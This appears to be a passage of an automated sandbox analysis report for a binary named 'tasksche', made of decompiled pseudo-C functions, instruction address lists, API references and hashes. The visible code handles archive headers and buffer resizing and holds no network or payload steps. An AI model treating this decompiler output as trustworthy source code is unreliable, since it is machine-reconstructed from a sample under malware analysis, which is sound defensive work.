                                                                                              				 *(_t45 - 4) = 1;
                                                                                              				E004083C0(_t45 - 0x6470, _t39,  *_t4); // executed
                                                                                              				 *(_t45 - 4) = 0;
                                                                                              				_t25 = E00407074(_t45 - 0x6470); // executed
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                                                                              				return _t25;
                                                                                              			}








                                                                                              0x0040e2d7
                                                                                              0x0040e2dc
                                                                                              0x0040e2e1
                                                                                              0x0040e2e7
                                                                                              0x0040e2ef
                                                                                              0x0040e2fc
                                                                                              0x0040e30d
                                                                                              0x0040e31a
                                                                                              0x0040e32b
                                                                                              0x0040e330
                                                                                              0x0040e330
                                                                                              0x0040e336
                                                                                              0x0040e337
                                                                                              0x0040e33c
                                                                                              0x0040e341
                                                                                              0x0040e34b
                                                                                              0x0040e355
                                                                                              0x0040e35c
                                                                                              0x0040e363
                                                                                              0x0040e36a
                                                                                              0x0040e36f
                                                                                              0x0040e37a
                                                                                              0x0040e37e
                                                                                              0x0040e389
                                                                                              0x0040e38d
                                                                                              0x0040e397
                                                                                              0x0040e3a0

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040E2DC
                                                                                              • _wcscpy.LIBCMT ref: 0040E2FC
                                                                                                • Part of subcall function 00410D16: _wcslen.LIBCMT ref: 00410D2C
                                                                                                • Part of subcall function 00410D16: _wcscpy.LIBCMT ref: 00410D42
                                                                                              • _wcscpy.LIBCMT ref: 0040E31A
                                                                                                • Part of subcall function 00407150: __EH_prolog.LIBCMT ref: 00407155
                                                                                                • Part of subcall function 00407074: __EH_prolog.LIBCMT ref: 00407079
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_wcscpy$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2067596392-0
                                                                                              • Opcode ID: aa5c2ab907567c22763022a3e14260f934ba444c4f603d8b7408ac10fc9ad921
                                                                                              • Instruction ID: 34baa23ef678cdf00172776f2fc4f6da7b22e3ce89fab18911e310d79256e735
                                                                                              • Opcode Fuzzy Hash: aa5c2ab907567c22763022a3e14260f934ba444c4f603d8b7408ac10fc9ad921
                                                                                              • Instruction Fuzzy Hash: E7112675906294AED705EBA4AC427CD7BA0DB16318F1040AFF444A2292CFB91A90DB6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E00401768(intOrPtr* __ecx, void* __edx) {
                                                                                              				void* __edi;
                                                                                              				void* _t25;
                                                                                              				signed int _t27;
                                                                                              				intOrPtr _t30;
                                                                                              				signed int _t31;
                                                                                              				intOrPtr _t35;
                                                                                              				void* _t54;
                                                                                              				void* _t58;
                                                                                              
                                                                                              				_t51 = __edx;
                                                                                              				E0041A4DC(E00429705, _t58);
                                                                                              				_t56 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0xb056)) != 0) {
                                                                                              					E0040117B(_t58 - 0x1c, __edx, __ecx);
                                                                                              					 *(_t58 - 4) = 0;
                                                                                              					__eflags =  *(__ecx + 0x658c);
                                                                                              					if( *(__ecx + 0x658c) == 0) {
                                                                                              						_push(0);
                                                                                              						_t25 = E00401B26(__ecx);
                                                                                              						_push(_t51);
                                                                                              						 *((intOrPtr*)( *__ecx + 0xc))();
                                                                                              						_t27 = E00403767(__ecx, _t51, _t58, __eflags, "CMT");
                                                                                              						_t54 = _t25;
                                                                                              						__eflags = _t27;
                                                                                              						if(_t27 == 0) {
                                                                                              							L6:
                                                                                              							 *((char*)(_t58 + 0xb)) = 0;
                                                                                              						} else {
                                                                                              							_push( *((intOrPtr*)(_t58 + 8)));
                                                                                              							_t31 = E004012EA(_t56, _t54); // executed
                                                                                              							 *((char*)(_t58 + 0xb)) = 1;
                                                                                              							__eflags = _t31;
                                                                                              							if(_t31 == 0) {
                                                                                              								goto L6;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_push( *((intOrPtr*)(__ecx + 0xb060)) + 0x14);
                                                                                              						 *((intOrPtr*)( *__ecx + 0xc))();
                                                                                              						E0040369F(__edx, _t58);
                                                                                              						_t35 =  *((intOrPtr*)(_t58 + 8));
                                                                                              						__eflags =  *(_t35 + 4);
                                                                                              						 *((char*)(_t58 + 0xb)) =  *(_t35 + 4) > 0;
                                                                                              					}
                                                                                              					_t15 = _t58 - 4;
                                                                                              					 *_t15 =  *(_t58 - 4) | 0xffffffff;
                                                                                              					__eflags =  *_t15;
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x1c)))) + 0xc))( *((intOrPtr*)(_t58 - 0x14)),  *((intOrPtr*)(_t58 - 0x10)), 0);
                                                                                              					_t30 =  *((intOrPtr*)(_t58 + 0xb));
                                                                                              				} else {
                                                                                              					_t30 = 0;
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
                                                                                              				return _t30;
                                                                                              			}











                                                                                              0x00401768
                                                                                              0x0040176d
                                                                                              0x00401777
                                                                                              0x00401781
                                                                                              0x0040178e
                                                                                              0x00401793
                                                                                              0x00401796
                                                                                              0x0040179c
                                                                                              0x004017c7
                                                                                              0x004017ca
                                                                                              0x004017cf
                                                                                              0x004017d3
                                                                                              0x004017dd
                                                                                              0x004017e2
                                                                                              0x004017e3
                                                                                              0x004017e5
                                                                                              0x004017f9
                                                                                              0x004017f9
                                                                                              0x004017e7
                                                                                              0x004017e7
                                                                                              0x004017ec
                                                                                              0x004017f1
                                                                                              0x004017f5
                                                                                              0x004017f7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004017f7
                                                                                              0x0040179e
                                                                                              0x004017a6
                                                                                              0x004017aa
                                                                                              0x004017ab
                                                                                              0x004017ae
                                                                                              0x004017b3
                                                                                              0x004017b8
                                                                                              0x004017bb
                                                                                              0x004017be
                                                                                              0x004017be
                                                                                              0x00401801
                                                                                              0x00401801
                                                                                              0x00401801
                                                                                              0x0040180c
                                                                                              0x0040180f
                                                                                              0x00401783
                                                                                              0x00401783
                                                                                              0x00401783
                                                                                              0x00401817
                                                                                              0x0040181f

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: CMT
                                                                                              • API String ID: 3519838083-2756464174
                                                                                              • Opcode ID: c5dcd452fd1e4eeec7eacad65d6409f1913b512c17b790326e9b6827e8618ada
                                                                                              • Instruction ID: 903a9e83ebfadd1395375551f57b58f4375dbb7200b7f1b09ca9293e13445996
                                                                                              • Opcode Fuzzy Hash: c5dcd452fd1e4eeec7eacad65d6409f1913b512c17b790326e9b6827e8618ada
                                                                                              • Instruction Fuzzy Hash: C5210275600144AFCB05EF6488908AEBBB9EF44314B00C06FF866773E2CB389E01DB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E00401106(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				intOrPtr _t12;
                                                                                              				intOrPtr _t13;
                                                                                              				unsigned int _t15;
                                                                                              				intOrPtr _t16;
                                                                                              				unsigned int _t20;
                                                                                              				intOrPtr _t23;
                                                                                              				unsigned int _t26;
                                                                                              				void* _t31;
                                                                                              				intOrPtr _t32;
                                                                                              				intOrPtr* _t34;
                                                                                              
                                                                                              				_t12 = _a4;
                                                                                              				_t34 = __ecx;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) + _t12;
                                                                                              				_t23 =  *((intOrPtr*)(__ecx + 4));
                                                                                              				if(_t23 >  *((intOrPtr*)(__ecx + 8))) {
                                                                                              					_t13 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                              					_push(_t31);
                                                                                              					if(_t13 != 0 && _t23 > _t13) {
                                                                                              						E00406423(_t23, 0x4335ac, L"Maximum allowed array size (%u) is exceeded", _t13);
                                                                                              						E004063CE(0x4335ac);
                                                                                              					}
                                                                                              					_t15 = ( *(_t34 + 8) >> 2) +  *(_t34 + 8) + 0x20;
                                                                                              					_t26 =  *(_t34 + 4);
                                                                                              					_t20 = _t26;
                                                                                              					_t43 = _t26 - _t15;
                                                                                              					if(_t26 <= _t15) {
                                                                                              						_t20 = _t15;
                                                                                              					}
                                                                                              					_push(_t20);
                                                                                              					_push( *_t34); // executed
                                                                                              					_t16 = E0041A594(_t20, _t31, _t34, _t43); // executed
                                                                                              					_t32 = _t16;
                                                                                              					if(_t32 == 0) {
                                                                                              						_t16 = E004063CE(0x4335ac);
                                                                                              					}
                                                                                              					 *_t34 = _t32;
                                                                                              					 *(_t34 + 8) = _t20;
                                                                                              					return _t16;
                                                                                              				}
                                                                                              				return _t12;
                                                                                              			}

















                                                                                              0x00401106
                                                                                              0x0040110b
                                                                                              0x0040110d
                                                                                              0x00401110
                                                                                              0x00401116
                                                                                              0x00401118
                                                                                              0x0040111d
                                                                                              0x00401125
                                                                                              0x00401132
                                                                                              0x0040113c
                                                                                              0x0040113c
                                                                                              0x00401149
                                                                                              0x0040114d
                                                                                              0x00401150
                                                                                              0x00401152
                                                                                              0x00401154
                                                                                              0x00401156
                                                                                              0x00401156
                                                                                              0x00401158
                                                                                              0x00401159
                                                                                              0x0040115b
                                                                                              0x00401160
                                                                                              0x00401166
                                                                                              0x0040116a
                                                                                              0x0040116a
                                                                                              0x0040116f
                                                                                              0x00401173
                                                                                              0x00000000
                                                                                              0x00401176
                                                                                              0x00401178

                                                                                              APIs
                                                                                              • _realloc.LIBCMT ref: 0040115B
                                                                                                • Part of subcall function 00406423: __vswprintf_c_l.LIBCMT ref: 00406441
                                                                                              Strings
                                                                                              • Maximum allowed array size (%u) is exceeded, xrefs: 0040112C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_realloc
                                                                                              • String ID: Maximum allowed array size (%u) is exceeded
                                                                                              • API String ID: 620378156-979119166
                                                                                              • Opcode ID: dce6db5a0bfaf73c63961f3884acddfac192c2d93569977231d8791de2d42667
                                                                                              • Instruction ID: b98885df3920ffeceb53ce79d7a953b92e5ea0a83a6506546a83ec3ee512e677
                                                                                              • Opcode Fuzzy Hash: dce6db5a0bfaf73c63961f3884acddfac192c2d93569977231d8791de2d42667
                                                                                              • Instruction Fuzzy Hash: 8D014F353006056FD728EA25D89193BB3E9EB88764310483FF99B97791EA39BC548718
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E00401417(signed int* __ecx, signed int __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t89;
                                                                                              				void* _t92;
                                                                                              				signed int _t96;
                                                                                              				signed int _t97;
                                                                                              				signed int _t98;
                                                                                              				signed int _t105;
                                                                                              				signed int _t106;
                                                                                              				signed int _t107;
                                                                                              				signed int _t115;
                                                                                              				signed int _t118;
                                                                                              				char* _t129;
                                                                                              				signed int _t130;
                                                                                              				signed int _t131;
                                                                                              				signed int _t133;
                                                                                              				char* _t138;
                                                                                              				void* _t139;
                                                                                              				signed int _t144;
                                                                                              				signed int _t145;
                                                                                              				void* _t175;
                                                                                              				signed int _t176;
                                                                                              				signed int* _t178;
                                                                                              				signed int _t179;
                                                                                              				signed int* _t181;
                                                                                              				void* _t185;
                                                                                              
                                                                                              				_t172 = __edx;
                                                                                              				E0041A4DC(E004294F4, _t185);
                                                                                              				_t181 = __ecx;
                                                                                              				_push(7);
                                                                                              				_t174 = __ecx + 0x6560;
                                                                                              				_push(__ecx + 0x6560);
                                                                                              				 *((char*)(__ecx + 0xb05c)) = 0;
                                                                                              				 *((char*)(__ecx + 0xb064)) = 0;
                                                                                              				if( *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 8))() == 7) {
                                                                                              					 *((intOrPtr*)(__ecx + 0xb060)) = 0;
                                                                                              					_t89 = E0040106A(_t174, 7);
                                                                                              					__eflags = _t89;
                                                                                              					if(_t89 == 0) {
                                                                                              						E00406760(_t185 - 0x1c, 0x100000);
                                                                                              						 *(_t185 - 4) = 0;
                                                                                              						_t92 =  *((intOrPtr*)( *_t181 + 0x10))();
                                                                                              						_t175 = _t92;
                                                                                              						_t144 =  *((intOrPtr*)( *_t181 + 8))( *(_t185 - 0x1c),  *((intOrPtr*)(_t185 - 0x18)) + 0xfffffff0);
                                                                                              						_t172 = 0;
                                                                                              						__eflags = _t144;
                                                                                              						if(_t144 <= 0) {
                                                                                              							L21:
                                                                                              							__eflags = _t181[0x2c18];
                                                                                              							if(_t181[0x2c18] != 0) {
                                                                                              								 *(_t185 - 4) =  *(_t185 - 4) | 0xffffffff;
                                                                                              								__eflags =  *(_t185 - 0x1c);
                                                                                              								if(__eflags != 0) {
                                                                                              									_push( *(_t185 - 0x1c));
                                                                                              									E0041A506(_t144, _t175, _t181, __eflags); // executed
                                                                                              								}
                                                                                              								goto L26;
                                                                                              							}
                                                                                              							__eflags =  *(_t185 - 0x1c);
                                                                                              							if(__eflags != 0) {
                                                                                              								_push( *(_t185 - 0x1c));
                                                                                              								E0041A506(_t144, _t175, _t181, __eflags);
                                                                                              							}
                                                                                              							goto L41;
                                                                                              						} else {
                                                                                              							goto L6;
                                                                                              						}
                                                                                              						do {
                                                                                              							L6:
                                                                                              							_t129 =  *(_t185 - 0x1c) + _t172;
                                                                                              							__eflags =  *_t129 - 0x52;
                                                                                              							if( *_t129 != 0x52) {
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							_t130 = E0040106A(_t129, _t144 - _t172);
                                                                                              							__eflags = _t130;
                                                                                              							if(_t130 == 0) {
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							_t181[0x2c14] = _t130;
                                                                                              							__eflags = _t130 - 1;
                                                                                              							if(_t130 != 1) {
                                                                                              								L18:
                                                                                              								_t131 = _t172 + _t175;
                                                                                              								_t172 =  *_t181;
                                                                                              								_t181[0x2c18] = _t131;
                                                                                              								 *((intOrPtr*)( *_t181 + 0xc))(_t131, 0, 0);
                                                                                              								_t133 = _t181[0x2c14];
                                                                                              								__eflags = _t133 - 2;
                                                                                              								if(_t133 == 2) {
                                                                                              									L20:
                                                                                              									_t172 =  *_t181;
                                                                                              									 *((intOrPtr*)( *_t181 + 8))( &(_t181[0x1958]), 7);
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								__eflags = _t133 - 3;
                                                                                              								if(_t133 != 3) {
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							__eflags = _t172;
                                                                                              							if(_t172 <= 0) {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							__eflags = _t175 - 0x1c;
                                                                                              							if(_t175 >= 0x1c) {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							__eflags = _t144 - 0x1f;
                                                                                              							if(_t144 <= 0x1f) {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							_t138 =  *(_t185 - 0x1c) - _t175 + 0x1c;
                                                                                              							__eflags =  *_t138 - 0x52;
                                                                                              							if( *_t138 != 0x52) {
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							__eflags =  *((char*)(_t138 + 1)) - 0x53;
                                                                                              							if( *((char*)(_t138 + 1)) != 0x53) {
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							__eflags =  *((char*)(_t138 + 2)) - 0x46;
                                                                                              							if( *((char*)(_t138 + 2)) != 0x46) {
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							__eflags =  *((char*)(_t138 + 3)) - 0x58;
                                                                                              							if( *((char*)(_t138 + 3)) == 0x58) {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							L16:
                                                                                              							_t172 = _t172 + 1;
                                                                                              							__eflags = _t172 - _t144;
                                                                                              						} while (_t172 < _t144);
                                                                                              						goto L21;
                                                                                              					} else {
                                                                                              						_t181[0x2c14] = _t89;
                                                                                              						__eflags = _t89 - 1;
                                                                                              						if(_t89 == 1) {
                                                                                              							_t179 =  *_t181;
                                                                                              							_t139 =  *((intOrPtr*)(_t179 + 0x10))(0);
                                                                                              							asm("sbb edx, ebx");
                                                                                              							 *((intOrPtr*)(_t179 + 0xc))(_t139 - 7, __edx);
                                                                                              						}
                                                                                              						L26:
                                                                                              						_t96 = _t181[0x2c14];
                                                                                              						__eflags = _t96 - 4;
                                                                                              						if(_t96 != 4) {
                                                                                              							__eflags = _t96 - 3;
                                                                                              							if(_t96 != 3) {
                                                                                              								_t181[0x195a] = 7;
                                                                                              								while(1) {
                                                                                              									L36:
                                                                                              									_t97 = E0040369F(_t172, _t185);
                                                                                              									__eflags = _t97;
                                                                                              									if(_t97 == 0) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t98 = _t181[0x1951];
                                                                                              									__eflags = _t98 - 1;
                                                                                              									if(_t98 == 1) {
                                                                                              										break;
                                                                                              									}
                                                                                              									__eflags = _t181[0x1952];
                                                                                              									if(_t181[0x1952] == 0) {
                                                                                              										L35:
                                                                                              										E004010C0(_t181);
                                                                                              										continue;
                                                                                              									}
                                                                                              									__eflags = _t98 - 4;
                                                                                              									if(_t98 == 4) {
                                                                                              										break;
                                                                                              									}
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								__eflags = _t181[0x2c19];
                                                                                              								if(_t181[0x2c19] == 0) {
                                                                                              									L39:
                                                                                              									E004010C0(_t181);
                                                                                              									__eflags = _t181[0x2c19];
                                                                                              									if(_t181[0x2c19] == 0) {
                                                                                              										L42:
                                                                                              										__eflags = _t181[0x1952];
                                                                                              										_t181[0x2c15] = _t181[0x1963];
                                                                                              										if(_t181[0x1952] == 0) {
                                                                                              											L44:
                                                                                              											E0040117B(_t185 - 0x2c, _t172, _t181);
                                                                                              											_t176 = _t181[0x2c10];
                                                                                              											_t145 = _t181[0x2c11];
                                                                                              											 *(_t185 - 0x14) = _t181[0x2c12];
                                                                                              											 *(_t185 - 0x10) = _t181[0x2c13];
                                                                                              											 *(_t185 - 4) = 1;
                                                                                              											 *(_t185 + 8) = _t181[0x1951];
                                                                                              											while(1) {
                                                                                              												_t105 = E0040369F(_t172, _t185);
                                                                                              												__eflags = _t105;
                                                                                              												if(_t105 == 0) {
                                                                                              													break;
                                                                                              												}
                                                                                              												_t106 = _t181[0x1951];
                                                                                              												__eflags = _t106 - 3;
                                                                                              												if(_t106 != 3) {
                                                                                              													__eflags = _t106 - 2;
                                                                                              													if(_t106 == 2) {
                                                                                              														__eflags = _t181[0x2c15];
                                                                                              														if(_t181[0x2c15] == 0) {
                                                                                              															L59:
                                                                                              															_t107 = 0;
                                                                                              															__eflags = 0;
                                                                                              															L60:
                                                                                              															_t181[0x2c16] = _t107;
                                                                                              															L61:
                                                                                              															_t69 = _t185 - 4;
                                                                                              															 *_t69 =  *(_t185 - 4) | 0xffffffff;
                                                                                              															__eflags =  *_t69;
                                                                                              															_t181[0x2c12] =  *(_t185 - 0x14);
                                                                                              															_t181[0x2c13] =  *(_t185 - 0x10);
                                                                                              															_t181[0x2c10] = _t176;
                                                                                              															_t181[0x2c11] = _t145;
                                                                                              															_t181[0x1951] =  *(_t185 + 8);
                                                                                              															 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t185 - 0x2c)))) + 0xc))( *((intOrPtr*)(_t185 - 0x24)),  *((intOrPtr*)(_t185 - 0x20)), 0);
                                                                                              															L62:
                                                                                              															__eflags = _t181[0x2c15];
                                                                                              															if(_t181[0x2c15] == 0) {
                                                                                              																L64:
                                                                                              																__eflags =  &(_t181[0x2c26]);
                                                                                              																E0041A7F7( &(_t181[0x2c26]),  &(_t181[7]));
                                                                                              																L65:
                                                                                              																_t115 = 1;
                                                                                              																L66:
                                                                                              																goto L67;
                                                                                              															}
                                                                                              															__eflags = _t181[0x2c16];
                                                                                              															if(_t181[0x2c16] == 0) {
                                                                                              																goto L65;
                                                                                              															}
                                                                                              															goto L64;
                                                                                              														}
                                                                                              														__eflags = _t181[0x1d9c];
                                                                                              														if(_t181[0x1d9c] != 0) {
                                                                                              															goto L59;
                                                                                              														}
                                                                                              														_t107 = 1;
                                                                                              														goto L60;
                                                                                              													}
                                                                                              													__eflags = _t106 - 5;
                                                                                              													if(_t106 == 5) {
                                                                                              														goto L61;
                                                                                              													}
                                                                                              													L53:
                                                                                              													E004010C0(_t181);
                                                                                              													continue;
                                                                                              												}
                                                                                              												__eflags = _t181[0x2c15];
                                                                                              												if(_t181[0x2c15] == 0) {
                                                                                              													L49:
                                                                                              													_t118 = 0;
                                                                                              													__eflags = 0;
                                                                                              													L50:
                                                                                              													_t181[0x2c16] = _t118;
                                                                                              													goto L53;
                                                                                              												}
                                                                                              												__eflags = _t181[0x266c];
                                                                                              												if(_t181[0x266c] != 0) {
                                                                                              													goto L49;
                                                                                              												}
                                                                                              												_t118 = 1;
                                                                                              												goto L50;
                                                                                              											}
                                                                                              											goto L61;
                                                                                              										}
                                                                                              										__eflags = _t181[0x2c17];
                                                                                              										if(_t181[0x2c17] != 0) {
                                                                                              											goto L62;
                                                                                              										}
                                                                                              										goto L44;
                                                                                              									}
                                                                                              									E00406376(0x19,  &(_t181[7]));
                                                                                              									__eflags =  *(_t185 + 8);
                                                                                              									if( *(_t185 + 8) != 0) {
                                                                                              										goto L42;
                                                                                              									}
                                                                                              									L41:
                                                                                              									_t115 = 0;
                                                                                              									goto L66;
                                                                                              								}
                                                                                              								__eflags =  *(_t185 + 8);
                                                                                              								if( *(_t185 + 8) == 0) {
                                                                                              									goto L41;
                                                                                              								}
                                                                                              								goto L39;
                                                                                              							}
                                                                                              							_t178 =  &(_t181[0x1959]);
                                                                                              							 *((intOrPtr*)( *_t181 + 8))(_t178, 1);
                                                                                              							__eflags =  *_t178;
                                                                                              							if( *_t178 != 0) {
                                                                                              								goto L41;
                                                                                              							}
                                                                                              							_t181[0x195a] = 8;
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						E00406376(0x3b,  &(_t181[7]));
                                                                                              						goto L41;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t115 = 0;
                                                                                              					L67:
                                                                                              					 *[fs:0x0] =  *((intOrPtr*)(_t185 - 0xc));
                                                                                              					return _t115;
                                                                                              				}
                                                                                              			}






























                                                                                              0x00401417
                                                                                              0x0040141c
                                                                                              0x00401425
                                                                                              0x0040142a
                                                                                              0x0040142c
                                                                                              0x00401432
                                                                                              0x00401433
                                                                                              0x0040143a
                                                                                              0x00401447
                                                                                              0x00401456
                                                                                              0x0040145c
                                                                                              0x00401461
                                                                                              0x00401463
                                                                                              0x00401495
                                                                                              0x0040149e
                                                                                              0x004014a1
                                                                                              0x004014ae
                                                                                              0x004014b7
                                                                                              0x004014b9
                                                                                              0x004014bb
                                                                                              0x004014bd
                                                                                              0x00401550
                                                                                              0x00401552
                                                                                              0x00401558
                                                                                              0x00401571
                                                                                              0x00401575
                                                                                              0x00401578
                                                                                              0x0040157a
                                                                                              0x0040157d
                                                                                              0x00401582
                                                                                              0x00000000
                                                                                              0x00401578
                                                                                              0x0040155a
                                                                                              0x0040155d
                                                                                              0x00401563
                                                                                              0x00401566
                                                                                              0x0040156b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004014c3
                                                                                              0x004014c3
                                                                                              0x004014c6
                                                                                              0x004014c8
                                                                                              0x004014cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004014d3
                                                                                              0x004014d8
                                                                                              0x004014da
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004014dc
                                                                                              0x004014e2
                                                                                              0x004014e5
                                                                                              0x0040151b
                                                                                              0x0040151d
                                                                                              0x00401520
                                                                                              0x00401527
                                                                                              0x0040152d
                                                                                              0x00401530
                                                                                              0x00401536
                                                                                              0x00401539
                                                                                              0x00401540
                                                                                              0x00401540
                                                                                              0x0040154d
                                                                                              0x00000000
                                                                                              0x0040154d
                                                                                              0x0040153b
                                                                                              0x0040153e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040153e
                                                                                              0x004014e7
                                                                                              0x004014e9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004014eb
                                                                                              0x004014ee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004014f0
                                                                                              0x004014f3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004014fa
                                                                                              0x004014fd
                                                                                              0x00401500
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401502
                                                                                              0x00401506
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401508
                                                                                              0x0040150c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040150e
                                                                                              0x00401512
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401514
                                                                                              0x00401514
                                                                                              0x00401515
                                                                                              0x00401515
                                                                                              0x00000000
                                                                                              0x00401465
                                                                                              0x00401465
                                                                                              0x0040146b
                                                                                              0x0040146e
                                                                                              0x00401474
                                                                                              0x00401479
                                                                                              0x0040147f
                                                                                              0x00401485
                                                                                              0x00401485
                                                                                              0x00401583
                                                                                              0x00401583
                                                                                              0x00401589
                                                                                              0x0040158c
                                                                                              0x0040159e
                                                                                              0x004015a1
                                                                                              0x004015c4
                                                                                              0x004015f0
                                                                                              0x004015f0
                                                                                              0x004015f2
                                                                                              0x004015f7
                                                                                              0x004015f9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004015d0
                                                                                              0x004015d6
                                                                                              0x004015d9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004015db
                                                                                              0x004015e2
                                                                                              0x004015e9
                                                                                              0x004015eb
                                                                                              0x00000000
                                                                                              0x004015eb
                                                                                              0x004015e4
                                                                                              0x004015e7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004015e7
                                                                                              0x004015fb
                                                                                              0x00401602
                                                                                              0x0040160a
                                                                                              0x0040160c
                                                                                              0x00401611
                                                                                              0x00401618
                                                                                              0x00401632
                                                                                              0x00401632
                                                                                              0x0040163f
                                                                                              0x00401645
                                                                                              0x00401654
                                                                                              0x00401658
                                                                                              0x00401663
                                                                                              0x00401669
                                                                                              0x0040166f
                                                                                              0x00401678
                                                                                              0x00401681
                                                                                              0x00401688
                                                                                              0x004016ca
                                                                                              0x004016cc
                                                                                              0x004016d1
                                                                                              0x004016d3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040168d
                                                                                              0x00401693
                                                                                              0x00401696
                                                                                              0x004016b9
                                                                                              0x004016bc
                                                                                              0x004016d7
                                                                                              0x004016de
                                                                                              0x004016ee
                                                                                              0x004016ee
                                                                                              0x004016ee
                                                                                              0x004016f0
